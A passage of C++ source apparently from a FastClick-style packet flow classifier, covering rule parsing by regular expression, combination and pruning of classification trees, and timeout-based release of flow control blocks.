FlowClassificationTable::Rule FlowClassificationTable::parse(Element* owner, String s, bool verbose, bool add_leaf) {
String REG_IPV4 = "[0-9]{1,3}(?:[.][0-9]{1,3}){3}";
String REG_NET = REG_IPV4 + "/[0-9]+";
String REG_AL = "(?:[a-z]+|[0-9]+)";
std::regex reg(("((?:(?:(?:agg|thread|(?:ip proto "+REG_AL+"|(?:src|dst) (?:host "+REG_IPV4+"|port "+REG_AL+"|net "+REG_NET+")|(?:(?:ip)?[+-]?[0-9]+/[0-9a-fA-F]+?/?[0-9a-fA-F]+?)))(?:[:]HASH-[0-9]+|[:]ARRAY)?[!]?(?:[ ]*&&[ ]*|[ \t]*))+)|-)([ \t]+keep)?([ \t]+[0-9]+|[ \t]+drop)?").c_str(),
std::regex_constants::icase);
std::regex classreg(("thread|agg|(?:(ip) (proto) ([a-z]+|[0-9]+)|(src|dst) (?:(host) ("+REG_IPV4+")|(port) ("+REG_AL+")|(net) ("+REG_NET+"))|(ip[+])?([-]?[0-9]+)/([0-9a-fA-F]+)?/?([0-9a-fA-F]+)?)([:]HASH-[0-9]+|[:]ARRAY)?([!])?").c_str(),
std::regex_constants::icase);
FlowNode* root = 0;
FlowNodePtr* parent_ptr = 0;
bool deletable_value = false;
int output = 0;
bool is_default = false;
std::smatch result;
std::string stdstr = std::string(s.c_str());
if (std::regex_match(stdstr, result, reg)){
FlowNodeData lastvalue = FlowNodeData((uint64_t)0);
std::string classs = result.str(1);
std::string keep = result.str(2);
std::string deletable = result.str(3);
if (keep == " keep")
deletable_value = true;
else if (deletable == " drop")
output = -1;
else if (deletable != "") {
output = std::stoi(deletable);
} else {
output = INT_MAX;
}
FlowNode* parent = 0;
if (classs != "-") {
std::regex_iterator<std::string::iterator> it (classs.begin(), classs.end(), classreg);
std::regex_iterator<std::string::iterator> end;
while (it != end)
{
if (verbose)
click_chatter("Class : %s",it->str(0).c_str());
int manoffset = 10;
std::string layer = it->str(1 + manoffset);
std::string offset = it->str(2 + manoffset);
std::string value = it->str(3 + manoffset);
std::string mask = it->str(4 + manoffset);
std::string hint = it->str(5 + manoffset);
std::string important = it->str(6 + manoffset);
if (verbose)
click_chatter("o : %s, v : %s, m : %s",offset.c_str(),value.c_str(), mask.c_str());
FlowLevel* f;
bool dynamic = false;
unsigned long valuev = 0;
if (classs == "agg" || classs=="AGG") {
FlowLevelAggregate* fl = new FlowLevelAggregate();
/*if (offset == "") {
fl->offset = 0;
} else {
fl->offset = std::stoul(offset);
}
fl->mask = maskv;*/
f = fl;
if (verbose)
click_chatter("AGG");
dynamic = true;
} else if (classs == "thread" || classs == "THREAD") {
FlowLevelThread* fl = new FlowLevelThread(click_max_cpu_ids());
f = fl;
click_chatter("THREAD");
dynamic = true;
} else {
unsigned long maskv = 0xffffffff;
int offset_v = 0;
if (it->str(1) == "ip") {
if (it->str(2) != "proto") {
click_chatter("UNIMPLEMENTED IP");
abort();
} else {
offset_v = 9;
maskv = UINT8_MAX;
valuev = 0;
if (it->str(3) == "tcp")
valuev = 6;
else if (it->str(3) == "udp")
valuev = 17;
else if (it->str(3) == "icmp")
valuev = 1;
else {
valuev = strtol(it->str(3).c_str(),NULL,10);
}
if (valuev == 0) {
click_chatter("Could not parse %s", it->str(3).c_str());
abort();
}
}
} else if (it->str(4) != "") {
if (it->str(7) == "port") {
maskv = UINT16_MAX;
if (it->str(4) == "src") {
offset_v = 20;
} else {
offset_v = 22;
}
} else {
maskv = UINT32_MAX;
if (it->str(4) == "src") {
offset_v = 12;
} else {
offset_v = 16;
}
}
if (it->str(5) == "host") {
IPAddress ip(it->str(6).c_str());
valuev = ip.addr();
} else if (it->str(7) == "port") {
valuev = htons(atoi(it->str(8).c_str()));
} else {
click_chatter("UNIMPLEMENTED net");
abort();
}
} else {
if (value != "" && value != "-") {
valuev = std::stoul(value,nullptr,16);
if (value.length() <= 2) {
} else if (value.length() <= 4) {
valuev = htons(valuev);
} else if (value.length() <= 8) {
valuev = htonl(valuev);
} else {
valuev = __bswap_64(valuev);
}
}
if (verbose)
click_chatter("Mask is '%s'",mask.c_str());
if (mask != "")
maskv = std::stoul(mask,nullptr,16);
else
maskv = (1ul << value.length() * 4) - 1;
offset_v = std::stoul(offset);
}
//TODO error for > 64
if (maskv <= UINT8_MAX){
FlowLevelGeneric8* fl = new FlowLevelGeneric8();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH8 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
} else if (maskv <= UINT16_MAX){
FlowLevelGeneric16* fl = new FlowLevelGeneric16();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH16 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
} else if (maskv <= UINT32_MAX){
FlowLevelGeneric32* fl = new FlowLevelGeneric32();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH32 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
#if HAVE_LONG_CLASSIFICATION
} else {
FlowLevelGeneric64* fl = new FlowLevelGeneric64();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH64 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
}
#else
} else {
assert(false);
}
#endif
if ((maskv & valuev) == 0)
dynamic = true;
}
FlowNodeDefinition* node = new FlowNodeDefinition(owner);
if (hint != "") {
node->_hint = String(hint.substr(1).c_str());
}
node->_level = f;
node->_parent = parent;
if (important == "!") {
//click_chatter("Important !");
node->_else_drop = true; //TODO : this is not really used anymore, all rules are "else drop" as all CTXDispatcher will add an else drop
}
if (root == 0) {
root = node;
} else {
parent_ptr->set_node(node);
parent_ptr->set_data(lastvalue);
if (parent_ptr != parent->default_ptr())
parent->inc_num();
}
parent = node;
if (dynamic) { //If a mask is provided, value is dynamic
//click_chatter("Dynamic node to output %d",output);
parent_ptr = node->default_ptr();
node->level()->set_dynamic();
lastvalue = FlowNodeData((uint64_t)-1);
} else {
//click_chatter("Value %d to output %d",valuev, output);
lastvalue = FlowNodeData((uint64_t)valuev);
bool need_grow;
parent_ptr = node->find(lastvalue, need_grow);
}
++it;
}
if (parent_ptr != parent->default_ptr())
parent->inc_num();
} else {
if (verbose)
click_chatter("Class : -");
FlowLevel* f = new FlowLevelDummy();
FlowNodeDefinition* fl = new FlowNodeDefinition(owner);
fl->_level = f;
fl->_parent = root;
root = fl;
parent = root;
//click_chatter("Default node to output %d",output);
parent_ptr = root->default_ptr();
is_default = true;
}
if (!add_leaf) {
if (dynamic_cast<FlowLevelDummy*>(parent->level()) == 0) {
FlowLevel* f = new FlowLevelDummy();
FlowNodeDefinition* fl = new FlowNodeDefinition(owner);
fl->_level = f;
fl->_parent = parent;
parent_ptr->set_node(fl);
//fl->default_ptr()->set_leaf((FlowControlBlock*)-1);
parent_ptr->set_data(lastvalue);
parent = fl;
parent_ptr = fl->default_ptr();
}
}
FlowControlBlock* fcb = FCBPool::init_allocate();
parent_ptr->set_leaf(fcb);
parent_ptr->leaf->parent = parent;
#if HAVE_FLOW_DYNAMIC
parent_ptr->leaf->acquire(1);
#endif
parent_ptr->set_data(lastvalue);
root->check();
} else {
click_chatter("%s is not a valid rule",s.c_str());
abort();
}
#if DEBUG_CLASSIFIER
click_chatter("Parse result of %s : ",s.c_str());
root->print();
#endif
if (!s.empty())
assert(root);
return FlowClassificationTable::Rule{.root = root, .output = output, .is_default = is_default};
}
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
/**
* @precond Timeout is not in list already
*/
void FlowTableHolder::release_later(FlowControlBlock* fcb) {
fcb_list& head = old_flows.get();;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK > 1
assert(!(fcb->flags & FLOW_TIMEOUT_INLIST));
assert(!head.find(fcb));
assert(head.count() == head.find_count());
#endif
fcb->next = head._next;
head._next = fcb;
++head._count;
fcb->flags |= FLOW_TIMEOUT_INLIST;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK > 1
assert(head.count() == head.find_count());
#endif
}
bool FlowTableHolder::check_release() {
fcb_list& head = old_flows.get();
FlowControlBlock* next = 0;
FlowControlBlock* b = head._next;
FlowControlBlock** prev = &head._next;
Timestamp now = Timestamp::recent_steady();
bool released_something = false;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK || DEBUG_CLASSIFIER_TIMEOUT
assert(head.count() == head.find_count());
#endif
while (b != 0) {
next = b->next;
if (b->count() > 0) {
#if DEBUG_CLASSIFIER_TIMEOUT > 2
click_chatter("FCB %p not releasable anymore as UC is %d",b,b->count());
#endif
released_something = true;
b->flags &= ~FLOW_TIMEOUT_INLIST;
*prev = b->next;
head._count--;
} else if (b->timeoutPassed(now)) {
#if DEBUG_CLASSIFIER_TIMEOUT > 2
click_chatter("FCB %p has passed timeout",b);
#endif
released_something = true;
b->flags = 0;
*prev = b->next;
head._count--;
#if HAVE_FLOW_DYNAMIC
b->_do_release();
#endif
} else {
unsigned t = (b->flags >> FLOW_TIMEOUT_SHIFT);
#if DEBUG_CLASSIFIER_TIMEOUT > 1
click_chatter("Time passed : %d/%d",(now - b->lastseen).msecval(),t);
#endif
prev = &b->next;
}
b = next;
}
#if DEBUG_CLASSIFIER_TIMEOUT > 0
click_chatter("Released %d",head.count());
#endif
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK > 0
assert(head.find_count() == head.count());
#endif
return released_something;
}
#endif
void FlowNodePtr::node_combine_ptr(FlowNode* parent, FlowNodePtr other, bool as_child, bool priority, bool no_dynamic, Element* origin) {
if (other.is_leaf()) {
assert(!as_child);
auto fnt = [other,as_child,priority,origin,no_dynamic](FlowNode* parent) -> bool {
//If the parent is dynamic, then the default will be duplicated, it is not to be considered as an "else"
if (no_dynamic && parent->level()->is_dynamic())
return true;
if (parent->default_ptr()->ptr == 0) { //This default leaf is empty
parent->default_ptr()->set_leaf(other.leaf->duplicate(1));
parent->default_ptr()->set_parent(parent);
} else {
if (as_child || !priority) {
FlowNodeData data = parent->default_ptr()->data();
#if HAVE_FLOW_DYNAMIC
//parent->default_ptr()->leaf->release();
#endif
parent->default_ptr()->set_leaf(other.leaf->duplicate(1));
parent->default_ptr()->leaf->parent = parent;
parent->default_ptr()->set_data(data);
} else {
if (!parent->default_ptr()->leaf->combine_data(other.leaf->data, origin))
abort();
if (parent->default_ptr()->leaf->is_early_drop() && !other.leaf->is_early_drop())
parent->default_ptr()->leaf->set_early_drop(false);
}
}
return true;
};
this->node->traverse_all_default_leaf(fnt);
} else {
FlowNode* new_node = node->combine(other.node, as_child, priority, true, origin);
if (new_node != node) {
node = new_node;
node->set_parent(parent);
}
}
}
/*******************************
* FlowNode
*******************************/
/**
* Combine this rule with another rule
* @arg other A node to merge
* @arg as_child
* - If true :merge the rule as a child of this one, ie REMOVING all child
* leaves (data is lost) and changing them by other.
* - If false : merge as the "else" path, ie appending other to all default path.
* @arg priority : Should this be considered as with priority than other. If not, rule
* may be exchanged for optimization
*
*/
FlowNode* FlowNode::combine(FlowNode* other, bool as_child, bool priority, bool duplicate_leaf, Element* origin) {
//TODO : priority is not used as of now, it is always assumed true. We could relax some things.
if (other == 0) return this;
other->check();
this->check();
assert(other->parent() == 0);
//Remove useless level (case where this is dummy)
if (dynamic_cast<FlowLevelDummy*>(this->level()) != 0) {
debug_flow("COMBINE (as child : %d, default is leaf : %d) : I am dummy",as_child,_default.is_leaf());
if (_default.is_leaf()) {
other->leaf_combine_data(_default.leaf, as_child, !as_child && priority, origin);
//TODO delete this;
return other;
} else {
FlowNode* node = _default.node;
_default.ptr = 0;
//TODO delete this;
node->set_parent(0);
return node->combine(other, as_child, priority, duplicate_leaf, origin);
}
}
//Remove useless level (case where other is dummy)
if (dynamic_cast<FlowLevelDummy*>(other->level()) != 0) { //Other is dummy :
debug_flow("COMBINE : Other is dummy")
//If other is a dummy (and we're not)
if (other->_default.is_leaf()) {
debug_flow("COMBINE : Other is a leaf (as child %d, duplicate leaf %d):",as_child, duplicate_leaf)
//other->_default.leaf->print("");
if (as_child) { //Combine a leaf as child of all our leaf
this->leaf_combine_data(other->_default.leaf, true, true, origin);
} else { //Combine a leaf as "else" of all our default routes
/*
* Duplicate the leaf for all null default routes and ED routes if priority is false (and as_child is false)
*/
auto fnt = [other,priority,duplicate_leaf](FlowNode* parent) -> bool {
if (parent->default_ptr()->ptr == 0) {
if (duplicate_leaf) {
parent->default_ptr()->set_leaf(other->_default.leaf->duplicate(1));
} else
parent->default_ptr()->set_leaf(other->_default.leaf);
parent->default_ptr()->set_parent(parent);
} else if (!priority && parent->default_ptr()->leaf->is_early_drop()) {
FCBPool::init_release(parent->default_ptr()->leaf);
if (duplicate_leaf) {
parent->default_ptr()->set_leaf(other->_default.leaf->duplicate(1));
} else
parent->default_ptr()->set_leaf(other->_default.leaf);
parent->default_ptr()->set_parent(parent);
}
return true;
};
this->traverse_all_default_leaf(fnt);
//this->default_ptr()->default_combine(this, other->default_ptr(), as_child);
other->default_ptr()->ptr = 0;
}
//TODO delete other;
return this;
} else {
FlowNode* node = other->_default.node;
other->_default.node = 0;
node->set_parent(0);
//TODO delete other;
return this->combine(node,as_child,priority,duplicate_leaf,origin);
}
}
flow_assert(!is_dummy());
flow_assert(!other->is_dummy());
if (this->level()->is_dynamic() && !other->level()->is_dynamic()) {
if (priority) {
click_chatter("Trying to attach a non-dynamic child to a dynamic node. This generally means you need a new CTXManager after a dynamic node, such as TCPIn elements or flow-based one");
this->print();
other->print();
abort();
} else {
this->set_parent(0);
debug_flow("Combining a dynamic parent with a non dynamic node. As Priority is false, we invert the child and the parent");
this->debug_print();
other->debug_print();
FlowNodeData d = this->node_data;
FlowNode* o = other->combine(this, as_child, false, duplicate_leaf,origin); //Priority is false in this path
o->node_data = d;
return o;
}
}
if (as_child)
__combine_child(other, priority, duplicate_leaf, origin);
else
__combine_else(other, priority, duplicate_leaf, origin);
return this;
}
void FlowNode::__combine_child(FlowNode* other, bool priority, bool duplicate_leaf, Element* origin) {
if (level()->equals(other->level())) { //Same level
#if DEBUG_CLASSIFIER
click_chatter("COMBINE : same level");
#endif
FlowNode::NodeIterator other_children = other->iterator();
/**
* We add each of the other child to us.
* - If the child does not exist, we add ourself simply as a child
* - If the child exist, we combine the item with the child
*/
FlowNodePtr* other_child_ptr;
while ((other_child_ptr = other_children.next()) != 0) { //For each child of the other node
#if DEBUG_CLASSIFIER
click_chatter("COMBINE-CHILD : taking child %lu",other_child_ptr->data().get_long());
#endif
bool need_grow;
FlowNodePtr* child_ptr = find(other_child_ptr->data(),need_grow);
if (child_ptr->ptr == 0) { //We have no same data, so we just append the other's child to us
*child_ptr = *other_child_ptr;
child_ptr->set_parent(this);
inc_num();
} else {
//There is some data in our child that is the same as the other child
if (child_ptr->is_leaf() || other_child_ptr->is_leaf()) {
#if DEBUG_CLASSIFIER
click_chatter("Combining leaf??? This error usually happens when rules overlap.");
child_ptr->print();
other_child_ptr->print();
assert(false);
#endif
} else { //So we combine our child node with the other child node
//We must set the parent to null, so the combiner nows he can play with that node
other_child_ptr->node->set_parent(0);
child_ptr->node = child_ptr->node->combine(other_child_ptr->node,true,priority, duplicate_leaf, origin);
child_ptr->node->set_parent(this);
}
}
//Delete the child of the combined rule
other_child_ptr->node = 0;
other->dec_num();
}
assert(other->getNum() == 0);
//Unsupported as of now
/* if (this->default_ptr()->ptr != 0 || other->default_ptr()->ptr == 0) {
click_chatter("Unsupported operation, combine as_child :");
this->print();
other->print();
}*/
//If other had a default, we need to merge it
if (other->default_ptr()->ptr != 0) { //Other had default
other->default_ptr()->set_parent(0);
this->default_ptr()->default_combine(this, other->default_ptr(), true, priority, origin);
other->default_ptr()->ptr = 0;
} //ELse nothing to do as we can keep our default as it, if any*/
//TODO delete other;
this->check();
return;
}
{
debug_flow("Combining different tables (%s -> %s) (as_child is %d) !",
level()->print().c_str(),
other->level()->print().c_str(),
true);
debug_flow("Adding other as child of all children leaf");
//In other terms, if the packet does not match any of the rules, it will go through "other"
#if DEBUG_CLASSIFIER
this->print();
other->print();
#endif
this->replace_leaves(other, true, false, true, origin);//Discard child FCB always as we are in the as_child path
//Well, it's not that complicated finally.
this->check();
return;
}
//It is too dangerous to keep a default exit case, each path and possible combination must return right by itself
assert(false);
}
/**
* Add a rule to all default path
*/
void FlowNode::__combine_else(FlowNode* other, bool priority, bool duplicate_leaf, Element* origin) {
if (level()->equals(other->level())) { //Same level
if (other->level()->is_dynamic()) {
level()->set_dynamic();
}
debug_flow("COMBINE-ELSE : same level");
FlowNode::NodeIterator other_children = other->iterator();
/**
* We add each of the other child to us.
* - If the child does not exist, we add ourself simply as a child
* - If the child exist, we combine the item with the child
*/
FlowNodePtr* other_child_ptr;
while ((other_child_ptr = other_children.next()) != 0) { //For each child of the other node
debug_flow("COMBINE-ELSE : taking child %lu",other_child_ptr->data().get_long());
bool need_grow;
FlowNodePtr* child_ptr = find(other_child_ptr->data(),need_grow);
if (child_ptr->ptr == 0) { //We have no same data, so we just append the other's child to us, merging it with a dup of our default
if (_default.ptr) {
debug_flow("Our child is empty, duplicating default (is_leaf : %d)",_default.is_leaf());
if (_default.is_leaf()) {
//If the other child is a leaf, copying the default would prevent replacement
if (other_child_ptr->is_leaf()) {
child_ptr->set_leaf(other_child_ptr->leaf->duplicate(1));
child_ptr->set_parent(this);
child_ptr->set_data(other_child_ptr->data());
inc_num();
goto next;
} else {
if (duplicate_leaf)
child_ptr->set_leaf(_default.leaf->duplicate(1));
else
child_ptr->set_leaf(_default.leaf);
child_ptr->set_data(other_child_ptr->data());
}
} else {
child_ptr->set_node(_default.node->duplicate(true,1, duplicate_leaf));
child_ptr->set_data(other_child_ptr->data());
}
child_ptr->set_parent(this);
inc_num();
goto attach;
} else {
*child_ptr = *other_child_ptr;
child_ptr->set_parent(this);
inc_num();
}
} else {
attach:
//There is some data in our child that is the same as the other child
if (child_ptr->is_leaf() && other_child_ptr->is_leaf()) {
debug_flow("Both rules are leaf, using the parent one if data match");
if (!child_ptr->leaf->combine_data(other_child_ptr->leaf->data, origin)) {
click_chatter("It is probable %p{element} accept the same packets than %p{element}. When merging the two following leafs:", dynamic_cast<FlowNodeDefinition*>(this)->_creator,dynamic_cast<FlowNodeDefinition*>(other)->_creator);
child_ptr->parent()->print();
other_child_ptr->parent()->print();
abort();
}
} else if (child_ptr->is_node() && other_child_ptr->is_node()) {
debug_flow("Both rules are nodes, combining");
//So we combine our child node with the other child node
//We must set the parent to null, so the combiner nows he can play with that node
other_child_ptr->node->set_parent(0);
child_ptr->node = child_ptr->node->combine(other_child_ptr->node,false,priority, duplicate_leaf, origin);
child_ptr->node->set_parent(this);
} else if (child_ptr->is_leaf() && other_child_ptr->is_node()) {
other_child_ptr->node->leaf_combine_data_create(child_ptr->leaf, true, true, false, origin);
child_ptr->set_node(other_child_ptr->node);
child_ptr->node->set_parent(this);
} else { //child is node and other is leaf
debug_flow("Child is node and the other is leaf");
//We are in an "else" case. We have to change all default paths to the action of the leaf
//But in case the default actions are dynamic, we don't want to replace as they should not be considered as default
child_ptr->node_combine_ptr(this, *other_child_ptr, false, priority, true, origin);
/**
* Example of such default situation:
* Path 0 is IP/TCP/dynamic
* Path 1 is IP
* --> We have to keep the data of leaf to path 0
*/
}
}
next:
//Delete the child of the combined rule
other_child_ptr->node = 0;
other->dec_num();
}
assert(other->getNum() == 0);
//If other had a default, we need to merge it
if (other->default_ptr()->ptr != 0) { //Other had default
debug_flow("Other has default (priority %d)!", priority);
other->default_ptr()->set_parent(0);
this->default_ptr()->default_combine(this, other->default_ptr(), false, priority, origin);
other->default_ptr()->ptr = 0;
} //Else nothing to do as we can keep our default as it, if any
//TODO : delete other;
this->check();
return;
}
debug_flow("Mhh... No easy combine. Combining other to all children and default (priority %d, as_child 0)",priority);
//In other terms, if the packet does not match any of the rules, it will go through "other"
this->debug_print();
other->debug_print();
NodeIterator it = iterator();
FlowNodePtr* cur;
FlowNodePtr Vpruned_default(other->duplicate(true, 1, duplicate_leaf));
while ((cur = it.next()) != 0) {
if (cur->is_node()) {
bool changed;
cur->node_combine_ptr(this, other->duplicate(true, 1, duplicate_leaf)->prune(level(), cur->data(), false, changed),false, priority, false, origin);
} else {
if (Vpruned_default.is_node()) { //Other is guaranteed to be not null here
bool changed;
FlowNodeData d = Vpruned_default.data();
Vpruned_default = Vpruned_default.node->prune(level(), cur->data(), true, changed);
}
}
}
#if DEBUG_CLASSIFIER
debug_flow("Pruned other default :");
Vpruned_default.print();
debug_flow("my default:");
if (this->default_ptr()->ptr != 0)
this->default_ptr()->print();
#endif
this->default_ptr()->default_combine(this, &Vpruned_default, false, priority, origin);
//TODO : delete other
#if DEBUG_CLASSIFIER
debug_flow("Result of no easy combine :");
this->print();
this->check();
#endif
return;
}
/**
* Correct iif this FLowNodePtr is a default ptr.
*
* Will combine this default pointer with whatever other is.
* - No need to set the data of the child as we are default
* - Parent is corrected at the end of the function
*/
void FlowNodePtr::default_combine(FlowNode* p, FlowNodePtr* other, bool as_child, bool priority, Element* origin) {
if (this->ptr == 0) { //We don't have default
debug_flow("No node, attaching other");
*this = (*other);
} else { //We have default, other have default
debug_flow("We have a node or a leaf %d %d , p %d",this->is_leaf(),other->is_leaf(),priority);
if (this->is_leaf() && other->is_leaf()) { //Our default is a leaf and other default is a leaf
if (!priority) {
FCBPool::init_release(this->leaf);
this->leaf = other->leaf;
} else {
if (!this->leaf->combine_data(other->leaf->data, origin))
abort();
if (this->leaf->is_early_drop() && !other->leaf->is_early_drop())
this->leaf->set_early_drop(false);
}
} else if (this->is_node()) { //Our default is a node, other is a leaf or a node
this->node_combine_ptr(p, *other, as_child, priority, false, origin);
} else { //other default is node, our is leaf
//We replace all other leaf with our data
other->node->leaf_combine_data_create(this->leaf, true, true, !priority || other->node->level()->is_dynamic(), origin);
flow_assert(other->node->has_no_default());
this->set_node(other->node);
}
}
this->set_parent(p);
}
void FlowNode::apply(std::function<void(FlowNodePtr*)>fnt) {
NodeIterator it = iterator();
FlowNodePtr* cur = 0;
while ((cur = it.next()) != 0) {
fnt(cur);
}
}
void FlowNode::apply_default(std::function<void(FlowNodePtr*)> fnt) {
apply(fnt);
if (_default.ptr) {
fnt(&_default);
}
}
/**
* Remove all branch of the tree that fully match the given leaf.
*/
/*FlowNodePtr FlowNodePtr::remove_matching(FlowControlBlock* leaf) {
traverse_all_leaves([this](FlowNodePtr* node){
bool remove = false;
leaf->parent()->traverse_parents([](FlowNode* parent) {
//if (node->prune())
});
FlowNodePtr dup = this->duplicate();
if (dup)
});
}
//TODO
*/
/**
* Prune the tree by adding the knowledge that the given level will or will not (inverted) be of the given value
* if inverted, it means the level will NOT be data
*/
FlowNodePtr FlowNode::prune(FlowLevel* olevel,FlowNodeData data, bool inverted, bool &changed) {
if (is_dummy()) { //If we are dummy, we cannot prune
return FlowNodePtr(this);
}
FlowNodePtr ptr(this);
debug_flow("Prune level %s(dyn%d) with %s(dyn%d), i %d, data %llu",
level()->print().c_str(),level()->is_dynamic(),
olevel->print().c_str(),olevel->is_dynamic(),
inverted,
data.get_long());
if (level()->is_dynamic()) { //If we are dynamic, we can remove from our mask the mask of the second value
debug_flow("Pruning a dynamic level...");
if (inverted && !olevel->is_dynamic()) {//We're in the default path, nothing to remove as it won't help that we know we won't see some static value
debug_flow("Inverted...");
} else { //Not inverted (we will see the given value), or inverted but other is a dynamic value meaning that the bits of level will be known when reaching this value
/* if ((olevel->is_dynamic() && !inverted)) {//We would be in the child of a dynamic level that is not on a defautl path
print();
assert(false);
}*/ //ALLOWED FOR VERIF-PRUNING
/**
* If other is dynamic or not does not matter, we will have those bits fixed, so we remove it from our dynamic mask
*/
if (this->level()->prune(olevel)) {
changed = true;
if (!this->level()->is_usefull()) {
//print();
debug_flow("Not usefull anymore, returning default !");
assert(this->getNum() == 0);
changed= true;
if (_default.is_node()) {
debug_flow("Node");
ptr = _default.node->prune(olevel, data, inverted, changed);
} else {
debug_flow("Leaf");
ptr = _default;
}
} else {
assert(this->getNum() == 0);
/*ptr.node->apply_default([ptr,olevel,data,inverted,&changed](FlowNodePtr* cur){
if (cur->is_leaf()) {
return;
}
FlowNodeData old_data = cur->data();
FlowNodePtr newcur = cur->node->prune(olevel, data, inverted, changed);
if (cur->ptr == newcur.ptr) //CHild did not change
return;
changed = true;
assert(newcur.ptr != 0);
if (newcur.is_node()) {
newcur.node->check();
}
*cur = newcur;
cur->set_data(old_data);
cur->set_parent(ptr.node);
});*/
}
}
}
} else {
debug_flow("Pruning a static level (inverted%d)...",inverted);
if (olevel->is_dynamic()) {
//At this time the value will be known... But that does not help us
click_chatter("Static child of a dynamic parent.");
assert(false);
} else {
if (inverted) {
if (olevel->equals(this->level())) { //Same level
//Remove data from level if it exists
debug_flow("Same level!");
bool need_grow;
FlowNodePtr* ptr_child = find(data,need_grow);
FlowNodePtr child = *ptr_child;
if (child.ptr) {
ptr_child->ptr = 0;
dec_num();
}
changed = true;
//TODO delete child
}
} else {
ptr = _level->prune(olevel, data, this, changed);
}
}
/*if (level->equals(this->level())) { //Same level
if (inverted) {
//Remove data from level if it exists
FlowNodePtr* ptr = find(data);
FlowNodePtr child = *ptr;
ptr->ptr = 0;
dec_num();
changed = true;
//TODO delete child
} else {
//Return the child
FlowNodePtr* ptr = find_or_default(data);
FlowNodePtr child = *ptr;
dec_num();
ptr->ptr = 0;
//TODO delete this;
changed = true;
return child;
}
}*/
}
if (ptr.is_leaf()) {
return ptr;
}
/**
* Prune all child node including default
*/
ptr.node->apply_default([ptr,olevel,data,inverted,&changed](FlowNodePtr* cur){
if (cur->is_leaf()) {
return;
}
FlowNodeData old_data = cur->data();
FlowNodePtr newcur = cur->node->prune(olevel, data, inverted, changed);
if (cur->ptr == newcur.ptr) //CHild did not change
return;
changed = true;
assert(newcur.ptr != 0);
if (newcur.is_node()) {
newcur.node->check();
}
*cur = newcur;
cur->set_data(old_data);
cur->set_parent(ptr.node);
});
/**
* If inverted and there is no more children, remove the node
*/
if (inverted) {
if (getNum() == 0 && !this->level()->is_dynamic()) {
//All child values were removed, return the default
FlowNodePtr def = *default_ptr();
default_ptr()->ptr = 0;
changed = true;
delete this;
return def;
}
}
return ptr;
}
/**
* Replace data in all leaf, without creating new ones.
*/
void FlowNode::leaf_combine_data(FlowControlBlock* leaf, bool do_final, bool do_default, Element* origin) {
traverse_all_leaves([leaf,origin](FlowNodePtr* ptr) -> bool {
if (!ptr->leaf->combine_data(leaf->data, origin))
abort();
if (ptr->leaf->is_early_drop() && !leaf->is_early_drop())
ptr->leaf->set_early_drop(false);
return true;
}, do_final, do_default);
}
/**
* Replace data in all leaf, creating new ones
*/
void FlowNode::leaf_combine_data_create(FlowControlBlock* leaf, bool do_final, bool do_default, bool discard_my_fcb_data, Element* origin) {
traverse_all_leaves_and_empty_default([leaf,discard_my_fcb_data,origin](FlowNodePtr* ptr,FlowNode* parent) -> bool {
if (ptr->leaf == 0) {
ptr->set_leaf(leaf->duplicate(1));
ptr->set_parent(parent);
} else {
if (!discard_my_fcb_data) {
if (!ptr->leaf->combine_data(leaf->data, origin))
abort();
if (ptr->leaf->is_early_drop() && !leaf->is_early_drop())
ptr->leaf->set_early_drop(false);
}
}
return true;
}, do_final, do_default);
}
/**
* Replace a leaf with a node. Return true if
* data from the parent allowed to prune the child (eg, the child contained a match for
* tcp port 80, but our parent already had it, or already cassify in a tcp port other than 80, in which case
* other is completely killed.
*/
bool FlowNodePtr::replace_leaf_with_node(FlowNode* other, bool discard, Element* origin) {
assert(is_leaf());
assert(ptr);
bool changed = false;
FlowNodeData old_data = data();
FlowNode* old_parent = parent();
if (old_parent == 0) {
click_chatter("Replacing leaf that has no parent !");
assert(false);
}
FlowControlBlock* old_leaf = leaf;
FlowNodePtr no(other->duplicate(true, 1, true));
flow_assert(other->is_full_dummy() || !other->is_dummy());
#if DEBUG_CLASSIFIER
click_chatter("Replacing leaf");
print();
click_chatter("Of:");
if (this->parent() and this->parent()->parent())
this->parent()->root()->print();
else if (this->parent())
this->parent()->print();
else
this->print();
click_chatter("With other :");
no.print();
#endif
//Prune the downward tree with all values of the future new parent
FlowNode* gparent = old_parent;
FlowNodeData gdata = old_data;
bool was_default = old_parent->default_ptr()->ptr == leaf;
while (gparent != NULL) {
//If this level was a default level, we must remove all known values of this level from the child
if (was_default and !gparent->level()->is_dynamic()) {
FlowNode::NodeIterator it = gparent->iterator();
FlowNodePtr* cur;
while ((cur = it.next()) != 0) {
no = no.node->prune(gparent->level(), cur->data(), true, changed);
}
} else
no = no.node->prune(gparent->level(),gdata, was_default, changed);
if (!no.ptr) { //Completely pruned, keep the FCB as it.
debug_flow("Completely pruned");
return true;
}
if (no.is_leaf()) {
break;
}
no.check();
gdata = gparent->node_data;
FlowNode* child = gparent;
gparent = gparent->parent();
was_default = !gparent || child == gparent->default_ptr()->node;
}
//Replace the pointer by the new
*this = no;
set_data(old_data);
set_parent(old_parent);
#if DEBUG_CLASSIFIER
if (changed) {
debug_flow("Pruned other : ");
no.print();
no.check();
} else {
debug_flow("Pruning did not change the node.");
}
#endif
//Combine FCB data
if (!discard) {
if (is_leaf()) {
if (!leaf->combine_data(old_leaf->data, origin))
abort();
if (leaf->is_early_drop() && !old_leaf->is_early_drop())
leaf->set_early_drop(false);
} else {
node->leaf_combine_data(old_leaf,true,true,origin); //We do all here as the downward must be completely updated with our data
}
}
return changed;
//Release original leaf
//TODO old_leaf->release(1);
}
/**
* Replace all leave of this node per another node (that will be deep duplicated for each replacement)
* Combines FCB values, asserting that they are equals or one is unset
*
*/
FlowNode* FlowNode::replace_leaves(FlowNode* other, bool do_final, bool do_default, bool discard_my_fcb_data, Element* origin) {
assert(do_final); //Protect against legacy
assert(!do_default); //Protect against legacy
